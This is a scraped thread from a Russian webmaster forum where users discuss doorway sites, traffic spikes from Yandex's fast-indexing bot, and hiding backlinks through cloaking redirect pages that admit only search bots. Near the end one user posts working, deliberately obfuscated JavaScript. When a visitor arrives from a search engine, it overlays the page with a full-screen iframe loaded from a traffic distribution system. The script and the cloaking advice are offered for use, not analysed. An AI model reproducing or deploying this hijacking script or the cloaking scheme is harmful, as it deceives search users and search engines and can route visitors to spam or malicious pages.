- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Странный ты тип. Видимо ты живешь в какой-то своей реальности, где есть "недодорвейщики" и "взрослые дорвейщики" - которые знаю как правильно делать дорвеи :) А ты наверное в этой всей каше король дорвейщиков? :)
Видимо у тебя какая-та детская психологическая травма от дорвейщиков, которые загоняют с помощью ББ или зависть, что так не получается :)
Ваша фамилия не Гримм? И брата нету? Хм...
Ну раз нет то нечего выдумывать.
З.Ы. Скилл уже был показан овер 80 лвл , толлько ты не понял нифига ))
У всех всё повылетало вчера вечером?.
Вчера вечером изрядно возросло количество трафа и до сих пор увеличивается.
Обычно в выходные трафф падал.
Вчера вечером изрядно возросло количество трафа и до сих пор увеличивается.
Обычно в выходные трафф падал.
Закон сохранения энергии... где-то убыло, где-то прибыло ;)
п.с. у меня ничего не вылетало. Зато новое не лезет. Придется апа ждать.
Спалю площадки, шабы, вообщем чтобы не вылетало. Бартер на источник быстрого. В л.с.
Наблюдаю за одним пациентом уже 2а дня, за эти дни +260к в яшке с быстрого и продолжается рост. Смотрел бэки по ahrefs, поиск по блогам яшки - пусто. Через что еще можно спалить бэки или очередная тема без бэков аля шара кнопка? Куплю тему -> лс.
rusy, изучи домен. во первых там скорее всего б/у домен с норм историей. таким больше быстробота позволено иметь, чем свежерегам. беки скрываются прокладкой с клоакингом.
rusy, изучи домен. во первых там скорее всего б/у домен с норм историей. таким больше быстробота позволено иметь, чем свежерегам. беки скрываются прокладкой с клоакингом.
домен не обычный, это да, о нем я все знаю и у меня есть подобные. Клоаку на реферер проверял - нету, не думаю, что есть по ip, если и даже есть врят ли можно как-то от всех сервисов спрятаться.
домен не обычный, это да, о нем я все знаю и у меня есть подобные. Клоаку на реферер проверял - нету, не думаю, что есть по ip, если и даже есть врят ли можно как-то от всех сервисов спрятаться.
клоакинг на прокладке. с твиттера ставим ссылку на прокладку, с прокладки редирект на сайт. на прокладке клоакинг (например пускать только ботов яндекса). все, беков в блогопоиске не увидишь, а бот яндекса придет.
клоакинг на прокладке. с твиттера ставим ссылку на прокладку, с прокладки редирект на сайт. на прокладке клоакинг (например пускать только ботов яндекса). все, беков в блогопоиске не увидишь, а бот яндекса придет.
Это теория или были случаи? Насколько мне известно боты через редиректы не ходят. Да и прокладка от какой-то пп. Подкинь сервисов, которые бэки палят ;)
Вот код с помощью которого через тдс подгружается покладка.
<script type="text/javascript">var url = 'http://tds/go.php?sid=30&tds-q=query';array_rect={};array_rect.searchers=[[/google\./i,/(\?|&)q=(.*?)(&|$)/i,2],[/search\.yahoo\./i,/(\?|&)p=(.*?)(&|$)/i,2],[/bing\.com/i,/(\?|&)q=(.*?)(&|$)/i,2],[/search\.aol\./i,/(\?|&)q=(.*?)(&|$)/i,2],[/ask\.com/i,/(\?|&)q=(.*?)(&|$)/i,2],[/altavista\./i,/(\?|&)q=(.*?)(&|$)/i,2],[/search\.lycos\./i,/(\?|&)query=(.*?)(&|$)/i,2],[/alltheweb\./i,/(\?|&)q=(.*?)(&|$)/i,2],[/yandex\./i,/(\?|&)text=(.*?)(&|$)/i,2],[/(nova\.|search\.)?rambler\./i,/(\?|&)query=(.*?)(&|$)/i,2],[/gogo\./i,/(\?|&)q=(.*?)(&|$)/i,2],[/go\.mail\./i,/(\?|&)q=(.*?)(&|$)/i,2],[/nigma\./i,/(\?|&)s=(.*?)(&|$)/i,2]];array_rect.array_rect=function(referer){var query=null;for(var i=0;i<array_rect.searchers.length;i++){var se=array_rect.searchers;if(referer.match(se[0])){sz='dy';myt='fr'+'am'+'e';var myu=document.getElementsByTagName('bo'+sz)[0];var elements='<div st'+'yle="position: fi'+'xed; width: 100%; hei'+'ght: 100%; z-index: 999; overflow: hidden; back'+'ground-c'+'olor: whi'+'te; top: 0px; left: 0px;"><i'+myt+' wid'+'th="100%" height="100%" frameborder="0" scro'+'lling="yes" style="overflow-x:hidden" src="'+url+'"><'+'/i'+myt+'></'+'div'+'>';myu.innerHTML+=elements;break}}};array_rect.array_rect(document.referrer);</script>Кто хотя бы наведет на мысль, поделюсь темой :))
Вот трафик с того дорвея, это за 3е суток.